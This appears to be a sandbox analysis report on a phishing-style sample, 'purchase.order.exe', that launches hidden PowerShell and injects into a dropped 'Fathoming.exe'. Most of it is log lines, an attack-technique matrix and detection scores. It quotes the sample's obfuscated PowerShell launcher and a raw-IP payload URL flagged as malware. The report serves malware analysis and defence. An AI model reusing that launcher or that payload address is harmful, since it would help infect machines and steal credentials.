      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B1AAEE mov eax, dword ptr fs:[00000030h] | 8_2_21B1AAEE
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B1AAEE mov eax, dword ptr fs:[00000030h] | 8_2_21B1AAEE
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B14AD0 mov eax, dword ptr fs:[00000030h] | 8_2_21B14AD0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B14AD0 mov eax, dword ptr fs:[00000030h] | 8_2_21B14AD0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AE0AD0 mov eax, dword ptr fs:[00000030h] | 8_2_21AE0AD0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B36ACC mov eax, dword ptr fs:[00000030h] | 8_2_21B36ACC
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B36ACC mov eax, dword ptr fs:[00000030h] | 8_2_21B36ACC
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B36ACC mov eax, dword ptr fs:[00000030h] | 8_2_21B36ACC
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B04A35 mov eax, dword ptr fs:[00000030h] | 8_2_21B04A35
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B04A35 mov eax, dword ptr fs:[00000030h] | 8_2_21B04A35
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B1CA38 mov eax, dword ptr fs:[00000030h] | 8_2_21B1CA38
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B1CA24 mov eax, dword ptr fs:[00000030h] | 8_2_21B1CA24
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B0EA2E mov eax, dword ptr fs:[00000030h] | 8_2_21B0EA2E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B6CA11 mov eax, dword ptr fs:[00000030h] | 8_2_21B6CA11
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B5CA72 mov eax, dword ptr fs:[00000030h] | 8_2_21B5CA72
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B5CA72 mov eax, dword ptr fs:[00000030h] | 8_2_21B5CA72
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B8EA60 mov eax, dword ptr fs:[00000030h] | 8_2_21B8EA60
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B1CA6F mov eax, dword ptr fs:[00000030h] | 8_2_21B1CA6F
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B1CA6F mov eax, dword ptr fs:[00000030h] | 8_2_21B1CA6F
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Fathoming.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\Fathoming.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Users\user\AppData\Local\Temp\Fathoming.exe base address: 400000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Fathoming.exe base: 1660000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Fathoming.exe "C:\Users\user\AppData\Local\Temp\Fathoming.exe"Jump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$unsolaced207=gc -raw 'c:\users\user\appdata\local\temp\blankbook85\patchworkenes\resprmiernes\databehandlende\pennyroyal.gri';$fortolkningssikker=$unsolaced207.substring(29825,3);.$fortolkningssikker($unsolaced207)
      Source: C:\Users\user\Desktop\purchase.order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$unsolaced207=gc -raw 'c:\users\user\appdata\local\temp\blankbook85\patchworkenes\resprmiernes\databehandlende\pennyroyal.gri';$fortolkningssikker=$unsolaced207.substring(29825,3);.$fortolkningssikker($unsolaced207)Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll | VolumeInformation
Source: C:\Users\user\Desktop\purchase.order.exe | Code function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 0_2_0040351C

      Stealing of Sensitive Information

Source: Yara match | File source: 00000008.00000002.3003104703.0000000021750000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

Source: Yara match | File source: 00000008.00000002.3003104703.0000000021750000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Masquerading | OS Credential Dumping | 211 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 411 Process Injection | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Clipboard Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Shared Modules | Logon Script (Windows) | 1 DLL Side-Loading | 1 Access Token Manipulation | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 411 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 114 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner
purchase.order.exe | 18% | ReversingLabs
purchase.order.exe | 100% | Joe Sandbox ML
Source | Detection | Scanner
C:\Users\user\AppData\Local\Temp\Fathoming.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Fathoming.exe | 18% | ReversingLabs
      No Antivirus matches
      No Antivirus matches
Source | Detection | Scanner | Label
http://212.162.149.66/JiYpNWaslXZHcEPiPEuXaEONVju173.bin) | 0% | Avira URL Cloud | safe
http://212.162.149.66/JiYpNWaslXZHcEPiPEuXaEONVju173.bin | 100% | Avira URL Cloud | malware
http://www.ftp.ftp://ftp.gopher. | 0% | Avira URL Cloud | safe
      No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://212.162.149.66/JiYpNWaslXZHcEPiPEuXaEONVju173.bin | false | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2640675750.00000000056FA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micro | powershell.exe, 00000002.00000002.2642154478.0000000006D30000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore6lB | powershell.exe, 00000002.00000002.2635924027.0000000004691000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://212.162.149.66/JiYpNWaslXZHcEPiPEuXaEONVju173.bin) | Fathoming.exe, 00000008.00000003.2948566344.0000000006074000.00000004.00000020.00020000.00000000.sdmp, Fathoming.exe, 00000008.00000002.2990340347.0000000006074000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
